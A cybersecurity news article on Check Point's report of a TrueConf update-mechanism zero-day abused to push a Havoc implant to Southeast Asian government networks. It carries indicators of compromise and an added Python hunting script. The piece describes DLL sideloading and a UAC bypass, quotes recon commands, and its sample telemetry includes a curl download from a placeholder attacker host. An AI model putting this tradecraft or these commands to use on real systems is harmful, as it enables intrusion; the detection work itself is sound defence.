TrueConf Zero-Day Exploited in Southeast Asia to Push Havoc via Trusted Update Channel

By Ash K

Check Point Research has disclosed a zero-day vulnerability in the TrueConf client for Windows that was actively exploited against government targets in Southeast Asia, turning a trusted enterprise collaboration platform into a malware distribution channel. The campaign, dubbed Operation TrueChaos, abused the software’s update mechanism to push a weaponized client package to connected endpoints and ultimately deploy what researchers assess was a Havoc implant.

The flaw is tracked as CVE-2026-3502 and carries a CVSS score of 7.8. At a high level, the issue is not a memory corruption bug or a parser crash. It is a trust-boundary failure in the update workflow. According to Check Point and the CVE record, the TrueConf client downloads and applies update code from the connected on-premises TrueConf server without performing sufficient integrity or authenticity verification. If an attacker controls that on-prem server, or can influence the update delivery path, they can substitute a malicious executable and have it delivered as though it were a legitimate client update.

That design choice is what makes the bug dangerous in enterprise and government environments. TrueConf is often deployed as an on-premises video conferencing platform inside private networks, including secure or disconnected environments. In those architectures, the central server is implicitly trusted by every connected client. Check Point says the attackers exploited exactly that trust relationship, replacing the normal update package on a government-operated TrueConf server and pushing the malicious version to multiple agencies that relied on the same infrastructure.

The attack chain is technically interesting because it blended software-update abuse with classic loader tradecraft. Check Point says the victim launched the already-installed TrueConf client, likely via a malicious link, and was shown a routine upgrade prompt. The downloaded installer appeared legitimate and even upgraded the client from 8.5.1 to 8.5.2, but it also dropped a benign poweriso.exe and a malicious 7z-x64.dll into C:\ProgramData\PowerISO\. The DLL was then loaded through DLL sideloading, giving the attackers code execution under the cover of an otherwise normal-looking application path.

From there, the operators moved into hands-on-keyboard activity. Check Point observed reconnaissance commands such as tasklist > cache and tracert 8.8.8.8 -h 5, followed by the download of an archive from an attacker-controlled FTP server. The archive contained a legitimate 7z.exe and a malicious iscsiexe.dll, which the attackers used as part of a UAC bypass chain involving the auto-elevated Microsoft iSCSI Initiator Control Panel binary iscsicpl.exe. The trick worked by modifying the current user’s PATH environment variable so Windows would resolve the attacker’s DLL first when the elevated process launched.

The post-compromise logic suggests a tightly scoped operational toolset rather than noisy commodity malware. Check Point describes iscsiexe.dll as a custom persistence and privilege-escalation component whose primary purpose was to maintain execution of the renamed poweriso.exe binary, called winexec.exe in the flow the researchers reconstructed. Check Point did not recover the exact final-stage payload from the compromised hosts, but observed network traffic to attacker infrastructure that was running Havoc C2 and matched that infrastructure to a Havoc demon sample. Based on that combined evidence, the researchers assess with high confidence that the end payload was a Havoc implant.

The campaign’s strategic significance comes from its scale and targeting model. The attackers did not have to compromise each workstation separately. They compromised or controlled the central on-premises TrueConf server, replaced the client update package stored under C:\Program Files\TrueConf Server\ClientInstFiles\, and then let the product’s own update process distribute the weaponized binary to downstream endpoints. That turns a routine maintenance feature into a trusted malware broadcast mechanism. In government networks where the same collaboration server is shared by multiple entities, the result is effectively a one-to-many infection path.

Check Point assesses with moderate confidence that the operation is linked to a Chinese-nexus threat actor. The attribution is based on the campaign’s victimology, the regional focus, the use of DLL sideloading, and command-and-control infrastructure hosted on providers such as Alibaba Cloud and Tencent. The researchers also note that the same victim was targeted in the same timeframe by ShadowPad, which may suggest shared access, overlapping operators, or parallel targeting by China-aligned actors. That is still an assessment rather than a formal attribution claim.

TrueConf has since addressed the issue. Check Point says the fix is included in the TrueConf Windows client starting with version 8.5.3, released in March 2026. The CVE record and third-party vulnerability trackers describe the affected range as TrueConf Client for Windows 8.1.0 through 8.5.2. Organizations running on-premises TrueConf should treat any pre-8.5.3 Windows client estate as potentially exposed if the server trust model was abused.

Indicators of Compromise (IoCs)

  • Malicious update executable: trueconf_windows_update.exe — MD5: 22e32bcf113326e366ac480b077067cf
  • Loader DLL: iscsiexe.dll — MD5: 9b435ad985b733b64a6d5f39080f4ae0
  • Havoc implant DLL: 7z-x64.dll — MD5: 248a4d7d4c48478dcbeade8f7dba80b3
  • C2 infrastructure: 43.134.90[.]60, 43.134.52[.]221, 47.237.15[.]197
  • Malware staging path: C:\ProgramData\PowerISO\poweriso.exe
  • Autorun persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck pointing to C:\ProgramData\PowerISO\PowerISO.exe
  • Possible dropped artifacts: %AppData%\Roaming\Adobe\update.7z, 7za.exe, iscsiexe.dll, rom.dat
  • Suspicious process chain: trueconf.exe → trueconf_windows_update.exe → trueconf_windows_update.tmp → any executable
  • Behavioral detections: poweriso.exe spawning cmd.exe, especially with curl, winrar.exe, or netstat in the command line

Hunting and response guidance

Defenders should start by validating the update path rather than focusing only on endpoints. If an on-premises TrueConf server was compromised or tampered with, every connected client may have been exposed. Check Point recommends treating systems as potentially infected if they contain an unexpected unsigned trueconf_windows_update.exe, the C:\ProgramData\PowerISO\ path, or the autorun registry value used for persistence. Hunting should include file creation from trueconf_windows_update.tmp into the PowerISO directory, suspicious child processes from poweriso.exe, and evidence of the iSCSI UAC-bypass chain involving iscsicpl.exe and iscsiexe.dll.
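The process-chain, file-drop, autorun and poweriso.exe child-process patterns from the IoC list and the hunting guidance above, expressed as detection logic that runs over exported process, file and registry telemetry. This is an added example, not Check Point's or TrueConf's code; the Sysmon-like dict event layout, the helper names and the sample events are constructed for illustration.

```python
import ntpath  # pure-Python Windows path handling, so the hunt runs over exported telemetry on any host
POWERISO_DIR = r"c:\programdata\poweriso"
RUN_VALUE = r"hkcu\software\microsoft\windows\currentversion\run\updatecheck"
CHILD_TERMS = ("curl", "winrar.exe", "netstat")
UPDATE_CHAIN = ["trueconf_windows_update.tmp", "trueconf_windows_update.exe", "trueconf.exe"]  # nearest parent first

def _base(path):
    return ntpath.basename(path or "").lower()

def _ancestors(by_pid, pid, depth):
    names = []  # image names walking up from pid, nearest parent first
    while pid in by_pid and len(names) < depth:
        image, pid = by_pid[pid]
        names.append(image)
    return names

def hunt(events):
    """Return (rule, detail) findings; feed events in order so parents precede children."""
    findings, by_pid = [], {}  # pid -> (image basename, parent pid)
    for ev in events:
        if ev["type"] == "process":
            image = _base(ev["image"])
            by_pid[ev["pid"]] = (image, ev["ppid"])
            if image == "trueconf_windows_update.exe" and not ev.get("signed", True):
                findings.append(("unsigned_updater", ev["pid"]))
            if _ancestors(by_pid, ev["ppid"], 3) == UPDATE_CHAIN:  # any executable under the updater chain
                findings.append(("update_chain_spawn", ev["pid"]))
            parent, cmd = by_pid.get(ev["ppid"], ("", 0))[0], ev.get("cmdline", "").lower()
            if parent == "poweriso.exe" and image == "cmd.exe" and any(t in cmd for t in CHILD_TERMS):
                findings.append(("poweriso_cmd_child", ev["pid"]))
        elif (ev["type"] == "file" and _base(ev["image"]) == "trueconf_windows_update.tmp"
              and ntpath.dirname(ev["target"]).lower() == POWERISO_DIR):
            findings.append(("tmp_drop_into_poweriso", _base(ev["target"])))
        elif (ev["type"] == "registry" and ev["key"].lower() == RUN_VALUE
              and ntpath.dirname(ev["data"]).lower() == POWERISO_DIR):
            findings.append(("run_key_persistence", ev["data"]))
    return findings

# Constructed sample telemetry modelled on the published chain; not real capture data
def P(pid, ppid, image, cmdline="", signed=True):
    return {"type": "process", "pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline, "signed": signed}
TMP = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_EVENTS = [
    P(100, 1, r"C:\Program Files\TrueConf\trueconf.exe"),
    P(101, 100, TMP + r"\trueconf_windows_update.exe", signed=False),
    P(102, 101, TMP + r"\trueconf_windows_update.tmp", signed=False),
    {"type": "file", "image": TMP + r"\trueconf_windows_update.tmp", "target": r"C:\ProgramData\PowerISO\7z-x64.dll"},
    P(103, 102, r"C:\ProgramData\PowerISO\poweriso.exe"),
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck", "data": r"C:\ProgramData\PowerISO\PowerISO.exe"},
    P(104, 103, r"C:\Windows\System32\cmd.exe", "cmd.exe /c tasklist > cache"),  # recon only: no match by itself
    P(105, 103, r"C:\Windows\System32\cmd.exe", "cmd.exe /c curl -o update.7z ftp://ftp.example.invalid/update.7z"),
]
```

Running `hunt(SAMPLE_EVENTS)` yields five findings in event order; the bare `tasklist > cache` child is deliberately left unmatched so the poweriso.exe rule fires only on the curl, winrar.exe or netstat cases the guidance names.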

The bigger lesson is that update channels inside private networks can become some of the most dangerous supply-chain paths in an organization. In this case, the attacker did not need an internet-facing exploit for every endpoint. They needed the ability to influence one trusted server and one weak update-validation design. Once those conditions were met, the platform’s own management logic became the distribution mechanism. That is what makes Operation TrueChaos a high-value case study for defenders protecting government, defense, and critical infrastructure environments built around centrally managed on-prem software.

Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.